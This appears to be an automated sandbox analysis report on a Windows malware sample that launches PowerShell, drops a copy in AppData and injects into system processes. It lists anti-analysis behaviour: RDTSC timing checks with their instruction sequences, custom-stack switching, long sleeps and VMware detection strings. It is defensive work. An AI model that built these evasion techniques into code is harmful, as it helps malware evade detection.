Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 890983726372673.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mZanCtInfW.exe PID: 7364, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 32F9904 second address: 32F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 32F9B6E second address: 32F9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 2519904 second address: 251990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 2519B6E second address: 2519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: 8B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: 9B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: 9D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: AD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: B140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: C140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Memory allocated: D140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: 92A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: A2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: 7B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: B610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Memory allocated: C610000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

Source: C:\Users\user\Desktop\890983726372673.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7230	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2526	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4620	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5308	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 860	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 9770	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 2.2 %

Source: C:\Users\user\Desktop\890983726372673.exe TID: 1476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7816	Thread sleep count: 4620 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7816	Thread sleep time: -9240000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7816	Thread sleep count: 5308 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7816	Thread sleep time: -10616000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7656	Thread sleep count: 202 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7656	Thread sleep time: -404000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7656	Thread sleep count: 9770 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 7656	Thread sleep time: -19540000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\890983726372673.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000A.00000002.2543669261.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000A.00000002.2551526353.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000003.2281273819.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
